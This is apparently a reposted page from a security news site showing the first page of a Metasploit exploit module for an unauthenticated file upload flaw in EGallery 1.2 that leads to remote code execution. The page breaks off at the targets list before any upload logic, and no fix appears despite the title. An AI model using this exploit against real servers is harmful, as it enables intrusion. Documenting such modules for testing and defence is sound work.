EGallery PHP file upload flaws and fixes-vulnerability warning-the black bar safety net

2012-07-28T00:00:00
ID MYHACK58:62201234458
Type myhack58
Reporter 佚名
Modified 2012-07-28T00:00:00

Description

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => "EGallery PHP File Upload Vulnerability",

'Description' => %q{

This module exploits a vulnerability found in EGallery 1.2 By abusing the

uploadify.php file, a malicious user can upload a file to the egallery/ directory

without any authentication, which results in arbitrary code execution. The module

has been tested successfully on Ubuntu 10.04.

},

'License' => MSF_LICENSE,

'Author' =>

[

'Sammy FORGIT', # Discovery, PoC

'juan' # Metasploit module

],

'References' =>

[

['OSVDB', '8 3 8 9 1'],

['BID', '5 4 4 6 4'],

['URL', 'http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']

],

'Payload' =>

{

'BadChars' => "\x00"

},

'DefaultOptions' =>

{

'ExitFunction' => "none"

},

'Platform' => ['php'],

'Arch' => ARCH_PHP,

'Targets' =>

[

[1] [2] [3] next